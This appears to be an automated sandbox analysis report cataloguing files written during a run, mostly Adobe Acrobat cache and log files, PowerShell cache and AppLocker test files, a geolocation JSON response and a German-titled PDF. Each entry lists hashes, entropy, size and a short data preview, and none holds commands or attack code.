                                                                          SSDEEP:6:YEQXJ2HXW8Wu0VoZcg1vRcR0YlzDeoAvJfshHHrPeUkwRe9:YvXKXWHu1Zc0vYVGUUUkee9
                                                                          MD5:78E45F166F0111D052C10CCF6D933A9E
                                                                          SHA1:D8A3036605995A111D608708DEB2E0DD764A9B08
                                                                          SHA-256:F49EA57BE88A4FBF1C7695F89F71B15C0A3F594B639484EA0BEF90609971B4C9
                                                                          SHA-512:E03CC34FAC8E61BF6D71E628B54F4D579F93902F10FAABE47D9408D1FC5C3BF403DB7BE7759605DAD1C0299DB1B8E751794BBE4FE4086599EC9241B7D5CA51EE
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"ce904ce4-c803-4ecd-9dc3-673d26c2c517","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1733170438158,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):282
                                                                          Entropy (8bit):5.26403389818267
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXW8Wu0VoZcg1vRcR0YlzDeoAvJTqgFCrPeUkwRe9:YvXKXWHu1Zc0vYVGTq16Ukee9
                                                                          MD5:9F81F8576D3F28A66182E844043A7932
                                                                          SHA1:AC2E48DA21FB13CD0100A46CD2BD595E8D5C14C2
                                                                          SHA-256:B66093EEF50B710F552CF4CC18ED60E4DB7171962D88D94E1763F0229742F472
                                                                          SHA-512:77E2098B704D8ABEA50507238F1B4965848179F5E5388E85B14344C2ECE05AA39259C3A99F301A1F3403751ADCB46F976D052AE107192DE8AA6C0EF54FBFC585
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"ce904ce4-c803-4ecd-9dc3-673d26c2c517","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1733170438158,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):4
                                                                          Entropy (8bit):0.8112781244591328
                                                                          Encrypted:false
                                                                          SSDEEP:3:e:e
                                                                          MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                          SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                          SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                          SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                          Malicious:false
                                                                          Preview:....

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):2817
                                                                          Entropy (8bit):5.137432849263348
                                                                          Encrypted:false
                                                                          SSDEEP:48:Y9TrCGK2j7hyb58VeQFyPXnuBqa9rhFXt:eTrCGKC7hybyyP33or3Xt
                                                                          MD5:E73EDD3173C6EBEA512E690B70D00CE4
                                                                          SHA1:DABE34DC3C2300B36877E074241127716D13F9AE
                                                                          SHA-256:25543B417632AEB14BA87948F16EE8CC9F86E04612ACDE7E4211A933B50BD3AF
                                                                          SHA-512:1A26F1A1E9D90DB52ECD458D21DAB1BBEDEA3AF2CDFD5BE16628DA722C512FE742E0462A284A767D6A325D16DE3D648ADA958CC5AD294BD37D51D2F27720EF6F
                                                                          Malicious:false
                                                                          Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"1878300e413db4996fadfebd9127b2f0","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":1122,"ts":1732994158000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"6b65cc8f1c5a95393b37db793f92c759","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":1164,"ts":1732994158000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"e223414d26c245e11b8b9c6ce02a1145","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1732994158000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"9d652ae21273d902a6d8f455e6de649c","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1732994158000},{"id":"DC_Reader_Edit_LHP_Banner","info":{"dg":"51bcb0f2ad6c3350e2c18478b4571e3c","sid":"DC_Reader_Edit_LHP_Banner"},"mimeType":"file","size":1102,"ts":1732994158000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"6e0d8ef5b758ad9a1a196a53c326d940","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
                                                                          Category:dropped
                                                                          Size (bytes):12288
                                                                          Entropy (8bit):1.1872624199985946
                                                                          Encrypted:false
                                                                          SSDEEP:48:TGufl2GL7msEHUUUUUUUU/sSvR9H9vxFGiDIAEkGVvp7S:lNVmswUUUUUUUU0+FGSIta
                                                                          MD5:C9EEAAB34CCCE12D412F88C0A9ABDE83
                                                                          SHA1:E3AE03A8F544D71394C75CDB7BAFC06542B4F820
                                                                          SHA-256:3FB08CDF8696C58580272E999CC5E7B615233B626F9BD8E27E9BCE1B83601DF5
                                                                          SHA-512:CA9BA3A523278E17DD4FD400451F3CE2022CE53E548B9E0BAF9F16BECBAE4153D074971B2A5590651ECB4396C6B6B2EDC520B8090F9B0E8A6F2C7C848C6D19BD
                                                                          Malicious:false
                                                                          Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:SQLite Rollback Journal
                                                                          Category:dropped
                                                                          Size (bytes):8720
                                                                          Entropy (8bit):1.6055832058945563
                                                                          Encrypted:false
                                                                          SSDEEP:48:7MhKUUUUUUUUUU/+vR9H9vxFGiDIAEkGVvSqFl2GL7msh:7zUUUUUUUUUUaFGSItQKVmsh
                                                                          MD5:849AC6F976C777B5C8DE4075434C5CFF
                                                                          SHA1:3E1CC232FBC7DC66699478B9EDD7E435C0685E5E
                                                                          SHA-256:EE69E1E5452398A86323BAA023D652B202E19B351A906C5F20F0E17BC1369BD7
                                                                          SHA-512:DB5C0428C12071EC8C6CDE528B7B5261122C9028934DEC71EDE5C33A9B9957CCD7980CAF4344607664EF2EC792638B02116FF92130055644FB243C7538B467D2
                                                                          Malicious:false
                                                                          Preview:.... .c......5.(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................f.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):66726
                                                                          Entropy (8bit):5.392739213842091
                                                                          Encrypted:false
                                                                          SSDEEP:768:RNOpblrU6TBH44ADKZEgoQI79XfI7Iw3q3/H8CWidOSZ0LZYyu:6a6TZ44ADEoQG9XfI7IdR5ZiZK
                                                                          MD5:F6EBD20F145CDCD3371F9ED7836632D9
                                                                          SHA1:0DAB72C69C53CB76FED4B18C8BADB4CB5773E4F9
                                                                          SHA-256:738B6AB1418F74288ED02E0F45E587BC34E170C3895183A25BE0CF5FEEF485A4
                                                                          SHA-512:D67DD406E2F222DDE2139D09D4B0EA6C6FD3AC2332A238CF180A02B52B2F8A1BF25FF14F9A4A43FD90C7ACBCE5D4B58B8492048E4211F41402100502CFEE70D5
                                                                          Malicious:false
                                                                          Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2

                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\json[1].json

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):963
                                                                          Entropy (8bit):5.014904284428935
                                                                          Encrypted:false
                                                                          SSDEEP:12:tkluJnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkwV:qluNdRNuKyGX85jvXhNlT3/7AcV9Wro
                                                                          MD5:B66CFB6461E507BB577CDE91F270844E
                                                                          SHA1:6D952DE48032731679F8718D1F1C3F08202507C3
                                                                          SHA-256:E231BBC873E9B30CCA58297CAA3E8945A4FC61556F378F2C5013B0DDCB7035BE
                                                                          SHA-512:B5C1C188F10C9134EF38D0C5296E7AE95A7A486F858BE977F9A36D63CBE5790592881F3B8D12FEBBF1E555D0A9868632D9E590777E2D3143E74FD3A44C55575F
                                                                          Malicious:false
                                                                          Preview:{. "geoplugin_request":"8.46.123.228",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):8003
                                                                          Entropy (8bit):4.840877972214509
                                                                          Encrypted:false
                                                                          SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                                                          MD5:106D01F562D751E62B702803895E93E0
                                                                          SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                                                          SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                                                          SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                                                          Malicious:false
                                                                          Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):64
                                                                          Entropy (8bit):1.1940658735648508
                                                                          Encrypted:false
                                                                          SSDEEP:3:NlllulxmH/lZ:NllUg
                                                                          MD5:D904BDD752B6F23D81E93ECA3BD8E0F3
                                                                          SHA1:026D8B0D0F79861746760B0431AD46BAD2A01676
                                                                          SHA-256:B393D3CEC8368794972E4ADD978B455A2F5BD37E3A116264DBED14DC8C67D6F2
                                                                          SHA-512:5B862B7F0BCCEF48E6A5A270C3F6271D7A5002465EAF347C6A266365F1B2CD3D88144C043D826D3456AA43484124D619BF16F9AEAB1F706463F553EE24CB5740
                                                                          Malicious:false
                                                                          Preview:@...e................................. ..............@..........

                                                                          C:\Users\user\AppData\Local\Temp\MSI58791.LOG

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):246
                                                                          Entropy (8bit):3.5136057226030957
                                                                          Encrypted:false
                                                                          SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K84OlvRD43w:Qw946cPbiOxDlbYnuRKwH43w
                                                                          MD5:13355542B5FB69E397EC971DC72CAAFE
                                                                          SHA1:C7A1E2D6DFD322B2641E832F527BC2F5FB069007
                                                                          SHA-256:461A9C399CD4D13A6A6C91E728BA2480303E20ACF1B5CDDCEF46BE32D5477CD0
                                                                          SHA-512:360311E2EC05F8BB76FEA2F3B7B05830B4205E6F361BA2EEF0E7D44A5FC18065289F3F3C1E916BBB67F1B68D78A5C988A722088EDCEAE0CA1B4466F116789319
                                                                          Malicious:false
                                                                          Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .3.0./.1.1./.2.0.2.4. . .1.4.:.1.5.:.5.5. .=.=.=.....

                                                                          C:\Users\user\AppData\Local\Temp\Schr. an GGV bzgl. Schadenersatzes.pdf

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:PDF document, version 1.6 (zip deflate encoded)
                                                                          Category:modified
                                                                          Size (bytes):111798
                                                                          Entropy (8bit):7.906255888186425
                                                                          Encrypted:false
                                                                          SSDEEP:3072:Hf74D9YtYRr68H9kz53z/uBe1xeXX4F5F6T6v:Hfet6AkpzuQeXX4Vc6v
                                                                          MD5:E9477EB60D7AD8C73FF94C26594FF93F
                                                                          SHA1:A0E396BC055752EA703572D080678B0D5314E323
                                                                          SHA-256:7FBC201ADB4E2B34792D032204151EF90E507917950E43FA3BA1D5B965575B54
                                                                          SHA-512:568057EA77ECF17A678645F9758BE1F8554A773C5823E5EC6D7DF89C2CEF2D03F262B495C79EC8C9BCFE160B3579D16AB33020A241E15255E1C467FCC086DEF4
                                                                          Malicious:false
                                                                          Preview:%PDF-1.6.%......81 0 obj.<</Filter/FlateDecode/First 4/Length 18/N 1/Type/ObjStm>>stream..h.T0P......0.......endstream.endobj.82 0 obj.<</Filter/FlateDecode/First 21/Length 319/N 4/Type/ObjStm>>stream..h...J.@.._e.`wg..%.V.E.P{!.".].B...P....dUD/..e.............."....m: y.Z.3.M...O.UuS.g....|....o.,......A..yi?^VM...S...-..Y..z...@...0....jA.7.........(4w.E.zw6...Ij.].H-;..1..g.x4U...N...Ik.+......@.uQ........v$.i..........--..x....k........^4...K.....Q.B..I...5..X..y.#0....l...(..?2b.gF...H.3?.s~.~..!..,.....endstream.endobj.83 0 obj.<</Filter/FlateDecode/First 62/Length 309/N 9/Type/ObjStm>>stream..h..KK.0...2.M(y5I.........C..J.M.....M.|S..e..L...P..H.$.@$...........$...2..e....L8....j.W..2..N(../>n].l")..F...........O..jm.e.P>.. .>.K[...G...|..'.*.0..5>I......W....s..[Je.lS&.k...,.%.|...(.]o>)$...?....Q-...._.<R!.(..7.......C..C..w.._.[...?.D...C1.......g..6....E......z.`......endstream.endobj.2 0 obj.<</Metadata 27 0 R/Outlines 9 0 R/Pages 3 0 R/T

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_154mhipp.nca.ps1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aolrvbrl.1ro.psm1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kcl5e1tn.ctu.ps1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q1bhtpk3.ny1.ps1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rnrnmxnk.ptg.psm1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ysb0j11v.4gv.psm1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-11-30 14-15-49-242.log

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:ASCII text, with very long lines (393)
                                                                          Category:dropped
                                                                          Size (bytes):16525
                                                                          Entropy (8bit):5.345946398610936
                                                                          Encrypted:false
                                                                          SSDEEP:384:zHIq8qrq0qoq/qUILImCIrImI9IWdFdDdoPtPTPtP7ygyAydy0yGV///X/J/VokV:nNW
                                                                          MD5:8947C10F5AB6CFFFAE64BCA79B5A0BE3
                                                                          SHA1:70F87EEB71BA1BE43D2ABAB7563F94C73AB5F778
                                                                          SHA-256:4F3449101521DA7DF6B58A2C856592E1359BA8BD1ACD0688ECF4292BA5388485
                                                                          SHA-512:B76DB9EF3AE758F00CAF0C1705105C875838C7801F7265B17396466EECDA4BCD915DA4611155C5F2AD1C82A800C1BEC855E52E2203421815F915B77AA7331CA0
                                                                          Malicious:false
                                                                          Preview:SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:088+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig:

                                                                          C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):15114
                                                                          Entropy (8bit):5.347382889516746
                                                                          Encrypted:false
                                                                          SSDEEP:384:PsgtIcRGFd2tYOu5ZL8jwyfK6deeg15IuhXj51Z4RS7tbLcN9STSvwv2HUutcF1G:otiL
                                                                          MD5:F9DEACB44AA62801EA204C64429D944F
                                                                          SHA1:65F4F7F27ABB2BF176BE0702068FCDA154AA8AC9
                                                                          SHA-256:A6CBE15CF819C2B35A3E98A106DD5F2D31D7A263E53835F9171DFC15E8083678
                                                                          SHA-512:54E184842CD5D581202CFB101DB0527FEC7DB056CCC61AD1418E73AB4504600209F692AA97B1955DCF8C0B97656621885767D48ABE80527C2006C428325B6E35
                                                                          Malicious:false
                                                                          Preview:SessionID=7aa4af42-83c9-49a8-a217-5538e629be34.1732994149255 Timestamp=2024-11-30T14:15:49:255-0500 ThreadID=2568 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=7aa4af42-83c9-49a8-a217-5538e629be34.1732994149255 Timestamp=2024-11-30T14:15:49:263-0500 ThreadID=2568 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=7aa4af42-83c9-49a8-a217-5538e629be34.1732994149255 Timestamp=2024-11-30T14:15:49:263-0500 ThreadID=2568 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=7aa4af42-83c9-49a8-a217-5538e629be34.1732994149255 Timestamp=2024-11-30T14:15:49:263-0500 ThreadID=2568 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=7aa4af42-83c9-49a8-a217-5538e629be34.1732994149255 Timestamp=2024-11-30T14:15:49:263-0500 ThreadID=2568 Component=ngl-lib_NglAppLib Description="SetConf

                                                                          C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):29752
                                                                          Entropy (8bit):5.3883516665788544
                                                                          Encrypted:false
                                                                          SSDEEP:768:anddBuBYZwcfCnwZCnR8Bu5hx18HoCnLlAY+iCBuzhLCnx1CnPrRRFS10l8gT2rH:z
                                                                          MD5:0372F637CBAA15E287EBA090A32ADA0B
                                                                          SHA1:A76EFFFF1442BFC3C0A55C0EEE98BA3C512B8DA2
                                                                          SHA-256:D684096FC136938F722958531AB81B142622FECAE35508896FC4AD46936EC1CF
                                                                          SHA-512:825F9F1C44DD34D5B35124A32C809FB1AF404CBABFC2CA3DC628B372AF7BF750D736B10FCB9F5906CD707B0C1969592384A7067CCA966DAFF5A6879FEFFCFB5B
                                                                          Malicious:false
